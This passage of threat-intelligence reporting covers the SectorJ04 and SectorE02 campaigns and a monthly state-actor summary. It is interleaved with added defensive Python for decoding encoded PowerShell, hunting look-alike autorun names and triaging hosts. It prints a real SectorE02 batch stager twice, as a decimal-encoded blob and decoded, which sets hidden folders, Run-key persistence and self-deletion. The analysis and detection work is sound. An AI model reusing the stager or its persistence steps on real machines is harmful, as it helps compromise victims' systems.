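    """Return the Base64 blob that follows an -EncodedCommand-style flag, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENC_FLAGS:
            return tokens[i + 1].strip("\"'")
    return None


def decode_ps(blob: str) -> str:
    """Undo PowerShell's encoding; invalid Base64 raises binascii.Error."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le", errors="replace")


def analyse(lines):
    """For each line carrying an encoded command, return the decoded script
    and the domain-check patterns it matches (empty list if none)."""
    hits = []
    for line in lines:
        blob = extract_encoded(line)
        if blob is None:
            continue
        try:
            script = decode_ps(blob)
        except (binascii.Error, ValueError):
            continue
        matched = [p for p in DOMAIN_CHECK_PATTERNS if re.search(p, script, re.IGNORECASE)]
        hits.append({"line": line, "script": script, "domain_check": matched})
    return hits


def domain_probe_alerts(lines):
    """Only the encoded commands that look like domain-membership checks."""
    return [h for h in analyse(lines) if h["domain_check"]]


# Constructed process-creation records (Sysmon-style CommandLine fields).
SAMPLE_LOG = [
    "CommandLine: powershell.exe -nop -w hidden -enc "
    + encode_ps("(Get-WmiObject Win32_ComputerSystem).PartOfDomain"),
    "CommandLine: powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "CommandLine: powershell.exe -EncodedCommand " + encode_ps("Get-Date"),
]

if __name__ == "__main__":
    for hit in domain_probe_alerts(SAMPLE_LOG):
        print(hit["script"], "->", hit["domain_check"])
```

Decoding before matching is the point: the encoded form of the same script differs with every whitespace change, so string rules on the raw command line are brittle, whereas rules on the decoded text are stable and can be reused for other post-exploitation checks in the same pipeline.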

Hacking activity using same email content as the past

In early August, the SectorJ04 group carried out extensive hacking activities targeting users around the world, including South Korea, India, Britain, the United States, Germany, Canada, Argentina, Bangladesh and Hong Kong.

Their activities were particularly heavy in healthcare-related areas such as healthcare, pharmaceuticals, biotechnology and healthcare wage management, as well as energy-related companies such as gas and wind power. They also continued their attacks on preexisting target areas such as manufacturing, distribution and retail.

Spam emails with body text written in French and English were found, and an MS Word file named with random numbers was used as the attachment. All emails found in this hacking activity had the same body text.

Figure 39 Spear phishing emails written in French and English

Spam emails in Korean were also identified in this activity, indicating that the email text used in the June hacking activity was reused. The attached file is an MS Word file titled “스캔_(random number).doc”.

Figure 40 Spear phishing email targeted to South Korea using the same text used in the past

The MS Word file used as an attachment is disguised as an order confirmation or a goods receipt. Running the macro in the document runs a downloader in DLL form using “rundll32.exe”. The downloader downloads FlawedAmmy RAT from the attacker’s server and runs it under the name “rundl32.exe”.

Figure 41 Malicious document execution screen disguised as order confirmation
Figure 42 Malicious document execution screen for Korean language users, disguised as a goods receipt
Figure 43 Part of the macro script included in the malicious document
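The three persistence names this report records, “wsus.exe” (Type 1), “winserv.exe” (Type 3) and “rundl32.exe” (this section), share a pattern: each imitates a Windows component, and one is a single character away from the real rundll32.exe. As an added example (not code from the report), the following hunt over autorun entries combines a watchlist of those names with a look-alike check against legitimate binaries and a check for system binary names running from user-writable paths. The autorun entries are constructed; on a real host they would come from the Run keys, scheduled tasks or an Autoruns export.

```python
"""Hunt autorun entries for SectorJ04-style persistence names.
Added example, not code from the report; the entries are constructed."""
import ntpath

# Persistence file names recorded in this report.
WATCHLIST = {"wsus.exe", "winserv.exe", "rundl32.exe"}

# Legitimate Windows binaries that are commonly imitated.
LEGIT_BINARIES = {
    "rundll32.exe", "svchost.exe", "wuauclt.exe", "explorer.exe", "lsass.exe",
    "csrss.exe", "services.exe", "winlogon.exe", "wusa.exe", "conhost.exe",
}

WINDOWS_DIRS = ("c:\\windows\\",)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character look-alikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(entry):
    """entry = (location, value name, image path) -> list of reasons, empty if clean."""
    _location, _value, path = entry
    name = ntpath.basename(path).lower()
    reasons = []
    if name in WATCHLIST:
        reasons.append("name on SectorJ04 autorun watchlist")
    for legit in sorted(LEGIT_BINARIES):
        if name != legit and levenshtein(name, legit) == 1:
            reasons.append(f"lookalike of {legit}")
    in_windows = path.lower().startswith(WINDOWS_DIRS)
    if name in LEGIT_BINARIES and not in_windows:
        reasons.append("system binary name outside the Windows directory")
    return reasons


def hunt(entries):
    """Return [(file name, image path, reasons)] for every flagged entry."""
    flagged = []
    for entry in entries:
        reasons = assess(entry)
        if reasons:
            flagged.append((ntpath.basename(entry[2]).lower(), entry[2], reasons))
    return flagged


RUN_KEY = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"

# Constructed autorun entries: three from the report's cases, one generic
# impostor, and two benign ones.
SAMPLE_AUTORUNS = [
    (RUN_KEY, "wsus", "C:\\Users\\alice\\AppData\\Roaming\\wsus.exe"),
    (RUN_KEY, "winserv", "C:\\ProgramData\\winserv.exe"),
    (RUN_KEY, "rundl32", "C:\\Users\\alice\\AppData\\Local\\Temp\\rundl32.exe"),
    (RUN_KEY, "svchost", "C:\\Users\\alice\\AppData\\Roaming\\svchost.exe"),
    ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SecurityHealth",
     "C:\\Windows\\System32\\SecurityHealthSystray.exe"),
    (RUN_KEY, "OneDrive", "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"),
]

if __name__ == "__main__":
    for name, path, reasons in hunt(SAMPLE_AUTORUNS):
        print(f"{path}: {'; '.join(reasons)}")
```

The watchlist catches only what has already been reported; the look-alike and path checks are what keep the rule useful when the next campaign picks a different name.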

The FlawedAmmy RAT found in this hacking activity had the existing “Ammyy Admin” string modified to “Popss Admin” and created a mutex named “KLGjigjuw4j892358u432i5”. In addition, the compile path “c:\\123\\123\\clear\\ammyygeneric\\target\\TrFmFileSys.h” was found inside the file.

Figure 44 Changed hard-coded string information in FlawedAmmy RAT
Figure 45 Mutex generation code using hard-coded string information

In addition to the above-mentioned changes, other changes, such as changes to the string decoding, were identified in the FlawedAmmy RAT found in the most recent hacking activity.

Conclusion

The SectorJ04 group’s range of targets increased sharply in 2019, and they appear to be striving to carry out elaborate attacks while at the same time targeting indiscriminately. They are one of the most active cybercrime groups of 2019, often modifying and tweaking their hacking methods and performing hacking activities periodically.

The SectorJ04 group’s hacking activities are expected to continue to increase, and the ThreatRecon team will continue to monitor the group’s attack activity.

Indicators of Compromise

IoCs of the SectorJ04 group included in the report can be found here.

More information about the SectorJ04 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Spearphishing Attachment
Spearphishing Link
Trusted Relationship

Execution

Command-Line Interface
Execution through API
Execution through Module Load
Exploitation for Client Execution
PowerShell
Rundll32
Scheduled Task
Scripting
Service Execution
User Execution
Windows Management Instrumentation

Persistence

Account Manipulation
New Service
Registry Run Keys / Startup Folder
Scheduled Task
Startup Items
System Firmware
Windows Management Instrumentation Event Subscription

Privilege Escalation

Bypass User Account Control
New Service
Scheduled Task
Startup Items

Defense Evasion

Bypass User Account Control
Code Signing
Disabling Security Tools
DLL Side-Loading
Exploitation for Defense Evasion
Hidden Window
Modify Registry
Obfuscated Files or Information
Rundll32
Scripting
Software Packing
Virtualization/Sandbox Evasion

Credential Access

Account Manipulation
Input Capture
Input Prompt

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Share Discovery
Permission Groups Discovery
Process Discovery
Query Registry
Remote System Discovery
Security Software Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
System Service Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Remote Desktop Protocol
Remote Services

Collection

Automated Collection
Data from Local System
Email Collection
Input Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Custom Cryptographic Protocol
Data Encoding
Remote Access Tools
Standard Application Layer Protocol
Standard Cryptographic Protocol

Exfiltration

Automated Exfiltration
Data Compressed
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Impact

Data Encrypted for Impact

References

KRCERT – Analysis of Attacks on AD Server (2019.04.17)
https://www.krcert.or.kr/data/reportView.do?bulletin_writing_sequence=35006

Monthly Threat Actor Group Intelligence Report, June 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from May 21 to June 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02 and SectorA05, were found among the SectorA hacking groups this June. The SectorA groups were mainly active in the Middle East, Southeast Asia and East Asia in June, targeting countries such as Jordan, the Philippines, South Korea and Japan.

The SectorA01 group mainly sent spear phishing emails to the Middle East and Southeast Asia which had Microsoft Office document files attached to them. However, in June, another case was discovered where they attached executable type malware that was disguised as a job application form.

The SectorA02 and SectorA05 groups are mainly active for monetary profit, but based on their hacking techniques and malware features, each group is aimed at different targets. The SectorA02 group mainly targets financial companies or companies related to cryptocurrency trading, while the SectorA05 group targets individuals who hold cryptocurrency. In the past, the two groups used spear phishing emails with malicious HWP or executable files attached. Recently, they have also used spear phishing emails impersonating cryptocurrency exchanges or government agencies.

Recently, the SectorA groups have been acting in parallel to target both diplomatic information related to their government and monetary gain. In the past, they mainly targeted financial companies and cryptocurrency exchanges to earn monetary benefits, but nowadays they have extended their range of targets to include individual holders of cryptocurrency. Attention is needed as their range of activities expands.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In June, a total of six hacking groups were found to be active in SectorB. Activities of each group were found in the following countries: SectorB01 group activity was discovered in Southeast Asia and Europe, mainly in the Philippines, the Netherlands and Ukraine. SectorB03 group activity was discovered in the Middle East, mainly in Saudi Arabia. SectorB04 group activity was discovered in East Asia, the Middle East and Europe, mainly in Taiwan, the Philippines, Turkey and Austria. SectorB06 group activity was discovered in the Middle East, mainly in Turkey and Kazakhstan. SectorB09 group activity was discovered in East Asia and North America, mainly in Japan, Hong Kong, Taiwan and Canada. SectorB14 group activity was discovered in East Asia and North America, mainly in South Korea and the United States.

They maintain their existing hacking techniques – using Spear Phishing emails with malicious Microsoft Office document files attached. Recently, they also attacked Microsoft SharePoint servers and MySQL servers that are connected to the Internet using new vulnerabilities and web shells. In addition, new malware targeting the Linux operating system has been found.

In the past, SectorB groups focused more heavily on North America, but recently attacks in the Middle East, Southeast Asia and East Asia have also increased. We believe this is related to their recent political and diplomatic situations and it is likely that the hacking activities in the Middle East, Southeast Asia, East Asia will continue for the time being.

3. SectorC Activity Features

A total of three hacking groups, SectorC02, SectorC08 and SectorC11, were found among the SectorC groups in June. They were active mainly in Europe (Moldova, Ukraine and Germany), countries with which they frequently have political friction. They are constantly using spear phishing emails with malware, but there are gradual changes in the characteristics of the attached executable files. They continue to use open source programs such as the remote control program UltraVNC, and have started to develop their malware from open source code. This is presumably done to bypass security solutions and analyst detection, and it also interferes with intelligence analysis efforts to track the attackers. SectorC groups are expected to continue hacking activities in countries with which they have political and diplomatic conflicts for the time being.

4. SectorD Activity Features

In June, a total of two hacking groups were found among the SectorD groups. They targeted countries in the Middle East with which they have a politically competitive relationship. Activities of each group were found in the following countries: SectorD02 group activity was discovered extensively from Central Asia to the Middle East, mainly in Hong Kong, Sweden, Tajikistan, the United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, the United States and Mexico. SectorD11 group activity was discovered from Central Asia to the Middle East.

They are constantly using spear phishing emails with Microsoft Office document files attached. In particular, obfuscated macro scripts and PowerShell code embedded in these document files download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilians who oppose the SectorD government.

Currently, the SectorD hacking groups have increased the frequency of their hacking activities against Western countries. This mainly targets the United States, with which they have political and military disputes, but also a pro-American nation in the Middle East. It is likely that the activities of the SectorD hacking groups will depend greatly on how the US exerts its influence and military activities in the future.

5. SectorF Activity Features

The SectorF01 group was discovered performing hacking activities in Southeast Asia, Europe and North America, including Vietnam, United Kingdom and the United States. They have consistently used spear phishing emails with attached Microsoft Office document files, but recently attached compressed files containing obfuscated HTA script files as well. This bypasses the detection of security solutions using script-based malware and avoids making the target suspicious as it launches normal documents when running the HTA file.

Analysis of the recent hacking activity of SectorF01 shows they seem to have two purposes. The first is surveillance of organizations and individuals who are against their government. The second is the collection of high-tech information from advanced countries that are nurturing high-tech and industrial technologies, which assists their government’s economic development and upgrading purposes. Recently, the hacking activity of SectorF01 for the purpose of high-tech corporate espionage is increasing, and it is likely that their activities targeting high-tech companies and countries will continue to increase in the future.

6. SectorH Activity Features

The SectorH01 group appears to operate as a contractor rather than belonging officially to a national security agency. Their hacking activities were found in South Asia and South America, including India and Brazil. They mainly use spear phishing emails with Microsoft Office documents attached.

In this case, macro scripts within the documents use PowerShell to download additional scripts from Pastebin (a text file storage site). This minimizes the exposure of the next stage payload even if the initial malware is detected by a security solution, and distributing malware through a public website that is open to the Internet can also bypass detection by security solutions. The SectorH01 group’s hacking activities were mainly carried out against their political competitor, India. Recently, however, their activities have been found in other regions, and we will continue monitoring them in order to further understand the purpose of the SectorH group.

7. Cyber Crime Activity Features

Hacking groups included in SectorJ are those that carry out high-profile cyber crime to seize financial information that can generate economic profit. In June, two such groups were found among the cyber crime groups, and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ01 group were mainly found in China, Germany, Slovenia, Sweden, Romania, Russia, the US, Brazil, and Costa Rica. The SectorJ01 group uses spear phishing emails with attached documents that exploit known code execution vulnerabilities in Microsoft Office. They also use Cobalt Strike, a common penetration testing tool.

The SectorJ04 group is one of the most active groups in recent years, and its activities have been found in a wide range of regions: Europe, Asia, North and South America, and Africa. Specific countries include Switzerland, Russia, Macedonia, France, Ukraine, Italy, Germany, South Korea, the Philippines, Taiwan, China, the USA, Ecuador, and Senegal.

As in the past, they use spear phishing emails with attached Microsoft Office documents whose embedded macro scripts download malware. Sometimes they use HTML file attachments too. Recently, the SectorJ04 group hacked organizations such as universities, manufacturing companies, and construction companies, so their targets are no longer limited to financial companies. They have extended their activities into industrial sectors, where the security posture is typically weaker than at financial companies, which is one way they attempt to generate high profits with low effort. As the SectorJ04 group’s targets diversify, financial losses are likely to occur in various countries across many industries.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government

Overview

From March to July this year, the ThreatRecon team observed a spear phishing campaign by the SectorE02 group against the Government of Pakistan and defense- and intelligence-related organizations there. The spear phishing emails carry Excel XLS attachments that ask the victim to enable macros, which then execute the downloader. Malicious document lures they have employed recently include a document purporting to be a registration form for the Pakistan Air Force.

Security advisory by the Pakistan government regarding targeted attacks

SectorE02 is a threat actor that has targeted countries in South Asia, especially Pakistan, since at least 2012. Their arsenal includes a modular framework researchers have dubbed the “YTY Framework”, which has Windows and mobile versions. This framework allows the SectorE02 group to constantly modify and even remake individual plugins, and to pick and choose which plugins, if any, are sent to each victim. The modularity also helps the SectorE02 group keep antivirus detections low, because each module only does something simple and will not even work without certain previously dropped files. In this post, we describe their lure document, first stage downloader, file plugin, screenshot plugin, keylogger plugin, and exfiltration uploader plugin.

Excel Spear Phishing

The Excel files they used had names such as Credit_Score.xls, Advance_Salary.xls, CSD_Schemes_2019.xls, and Agrani_Bank.xls. In some instances, the file masqueraded as an Excel calculator from the National Bank of Pakistan.

Lure document 1

Later in the campaign, however, the group appeared to switch to using a MsgBox to display an error saying “This file is corrupted”.

Lure document 2

Behind the scenes, the Excel macro retrieves encoded data stored inside the document itself. The encoding is a simple decimal encoding of each byte, with a comma (or an exclamation mark) as the separator. The same encoding is used for the dropped executable, although more often one entire file is encoded as a ZIP archive containing two files, a batch script and an executable, which is then unzipped and executed.

All four files here are illustration copies of the original “.txt”, “.pdf”, and “.inp” files, which are actually executable binaries
Example Encoded Batch File in XLS Doc using Comma Separator
101,99,104,111,32,111,102,102,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,92,78,101,105,103,104,98,111,117,114,104,111,111,100,92,83,112,111,111,108,115,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,92,78,101,116,119,111,114,107,92,83,101,114,118,101,114,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,92,78,101,105,103,104,98,111,117,114,104,111,111,100,92,83,112,111,111,108,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,92,78,101,116,119,111,114,107,92,83,101,114,118,101,114,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,34,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,34,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,34,13,10,83,69,84,32,47,65,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,32,13,10,83,69,84,32,47,65,32,82,65,78,68,61,37,82,65,78,68,79,77,37,32,49,48,48,48,48,32,43,32,49,32,13,10,101,99,104,111,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,45,37,82,65,78,68,37,32,62,62,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,119,105,110,46,116,120,116,13,10,101,99,104,111,32,37,67,79,77,80
,85,84,69,82,78,65,77,69,37,45,37,82,65,78,68,37,32,62,62,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,119,105,110,46,116,120,116,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,70,105,108,101,115,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,87,105,110,115,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,83,121,110,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,68,97,116,97,117,112,100,97,116,101,32,47,102,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,70,105,108,101,115,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,106,117,99,104,101,107,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,87,105,110,115,32,47,116,32,82,69,71,95,83,90,32,47
,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,115,118,99,104,111,116,115,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,83,121,110,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,108,115,115,109,115,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,85,112,100,97,116,101,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,108,115,115,109,112,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,68,97,116,97,117,112,100,97,116,101,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,107,121,108,103,114,46,101,120,101,13,10,109,111,118,101,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,65,112,112,68,97,116,97,92,106,117,99,104,101,107,46,116,116,112,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,114,101,110,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,106,117,99,104,101,107,46,116,116,112,32,106,117,99,104,101,107,46,101,120,101,13,10,100,101,108,32,37,48
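The following decoder is an added example for the encoding described above; it is not code from the original post or from the SectorE02 macro. It accepts either separator, tolerates the line breaks and leading commas that copy-pasting the blob introduces, and, when the decoded bytes turn out to be a ZIP archive, lists and extracts the members the way the macro would. The two sample payloads are constructed inside the script (a short batch fragment and a tiny ZIP holding a batch file and a stub that only starts with "MZ"), not taken from a real sample.

```python
"""Decoder for the separator-delimited decimal byte encoding used in the
SectorE02 Excel macros: each byte of the payload is written as its decimal
value, joined with ',' or '!'. If the decoded blob is a ZIP archive, the
members (batch script + executable in the campaign) are extracted."""
import io
import re
import zipfile


def decode_decimal_payload(encoded: str) -> bytes:
    """Turn '101,99,104,111' (or '101!99!104!111') back into raw bytes.
    Whitespace, newlines and empty tokens from copy-paste are ignored; a
    token outside 0..255 is rejected rather than silently skipped."""
    tokens = [t.strip() for t in re.split(r"[,!]", encoded) if t.strip()]
    out = bytearray()
    for t in tokens:
        v = int(t)
        if not 0 <= v <= 255:
            raise ValueError(f"byte value out of range: {t!r}")
        out.append(v)
    return bytes(out)


def classify_payload(blob: bytes) -> str:
    """Coarse type by magic bytes: ZIP local header, PE 'MZ' stub, or text."""
    if blob.startswith(b"PK\x03\x04"):
        return "zip"
    if blob.startswith(b"MZ"):
        return "pe"
    return "text"


def extract_zip_members(blob: bytes) -> dict:
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def encode_decimal_payload(data: bytes, sep: str = ",") -> str:
    """Inverse of the decoder; used here only to build the constructed samples."""
    return sep.join(str(b) for b in data)


def decode_and_describe(encoded: str) -> dict:
    """Decode one payload and report what it is plus the type of each archive member."""
    blob = decode_decimal_payload(encoded)
    kind = classify_payload(blob)
    result = {"kind": kind, "size": len(blob), "members": {}}
    if kind == "zip":
        members = extract_zip_members(blob)
        result["members"] = {name: classify_payload(data) for name, data in members.items()}
    return result


# Constructed sample 1: a two-line batch fragment, comma separated.
SAMPLE_BATCH = encode_decimal_payload(
    b"echo off\r\nrd /s /q %USERPROFILE%\\DriveData\\Files\r\n")


def _build_sample_zip() -> bytes:
    """Constructed ZIP with a batch script and a fake executable (an 'MZ' stub,
    not a real PE), mirroring the two-file archive the macro more often drops."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("run.bat", "echo off\r\ndel %0\r\n")
        zf.writestr("bgfRdstr54sf.inp", b"MZ" + b"\x00" * 62)
    return buf.getvalue()


# Constructed sample 2: the same archive using '!' as the separator.
SAMPLE_ZIP = encode_decimal_payload(_build_sample_zip(), sep="!")

if __name__ == "__main__":
    print(decode_and_describe(SAMPLE_BATCH))
    print(decode_and_describe(SAMPLE_ZIP))
```

Feeding the full comma blob shown above into decode_decimal_payload() reproduces the batch script listed in the next section; feeding the ".inp" variant yields a PE and classify_payload() reports "pe", which is the quickest way to tell whether a given macro drops a script or a binary.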

The dropped batch scripts follow the same basic format: creating folders with the hidden, system, and archive attributes, dropping the batch and executable files there, and setting persistence through either scheduled tasks or the Run registry key. A text file containing the %COMPUTERNAME% value followed by random digits is also saved as “win.txt”; the downloader executable refuses to run unless this file exists.

A dump showing the scheduled task created by the batch script

The batch file that is dropped is used for three main purposes: 1) to set up the first folder, which is used to store the text file containing the computer name, 2) to set up what we call the “common exfiltration folder” which each individual plugin uses for different purposes, and 3) to set up persistence via scheduled task or registry run keys.

Example Decoded Batch File in XLS Doc
echo off
rd /s /q %USERPROFILE%\Printers\Neighbourhood\Spools
rd /s /q %USERPROFILE%\Print\Network\Server
rd /s /q %USERPROFILE%\DriveData\Files
rd /s /q %USERPROFILE%\DriveData\Wins
md %USERPROFILE%\Printers\Neighbourhood\Spools
md %USERPROFILE%\DriveData\Files
md %USERPROFILE%\DriveData\Wins
md %USERPROFILE%\Print\Network\Server
attrib +a +h +s "%USERPROFILE%\DriveData"
attrib +a +h +s "%USERPROFILE%\Printers"
attrib +a +h +s "%USERPROFILE%\Print"
SET /A %COMPUTERNAME%
SET /A RAND=%RANDOM% 10000 + 1
echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Files\win.txt
echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Wins\win.txt
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Files /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Wins /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BigSyn /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Dataupdate /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Files /t REG_SZ /d %USERPROFILE%\DriveData\Wins\juchek.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Wins /t REG_SZ /d %USERPROFILE%\DriveData\Files\svchots.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BigSyn /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssms.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BigUpdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssmp.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Dataupdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\kylgr.exe
move %userprofile%\AppData\juchek.ttp %userprofile%\DriveData\Wins
ren %userprofile%\DriveData\Wins\juchek.ttp juchek.exe
del %0
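The batch stager above leaves three host artefacts that are cheap to hunt for: the staging folders under the user profile, the win.txt victim-ID file the downloader and uploader insist on, and the HKCU Run values pointing into those folders. The script below is an added triage example, not NSHC's tooling. It takes the Run values as a plain dict so it runs on any OS and can be unit-tested; on a live Windows host you would fill that dict from winreg (HKEY_CURRENT_USER, SOFTWARE\Microsoft\Windows\CurrentVersion\Run). The "infected" profile that make_sample_profile() builds in a temp directory is constructed test data.

```python
"""Host triage for the artefacts of the SectorE02 batch stager: staging
folders, the <COMPUTERNAME>-<random> win.txt file, and HKCU Run values
pointing into the staging folders. Run values are supplied by the caller."""
import os
import re
import tempfile
from pathlib import Path

# Relative (to %USERPROFILE%) folders created by the batch scripts seen so far.
STAGING_DIRS = [
    r"DriveData\Files", r"DriveData\Wins",
    r"Printers\Neighbourhood\Spools", r"Print\Network\Server",
]
# Run value names used by the script above.
RUN_VALUE_NAMES = {"Files", "Wins", "BigSyn", "BigUpdate", "Dataupdate"}
VICTIM_ID_RE = re.compile(r"^.+-\d{1,5}$")   # e.g. DESKTOP-AB12-4821


def _to_local(rel_win_path: str) -> str:
    # The batch script writes backslash paths; translate for the host we run on.
    return rel_win_path.replace("\\", os.sep)


def hunt_yty_stager(userprofile: str, run_values: dict) -> list:
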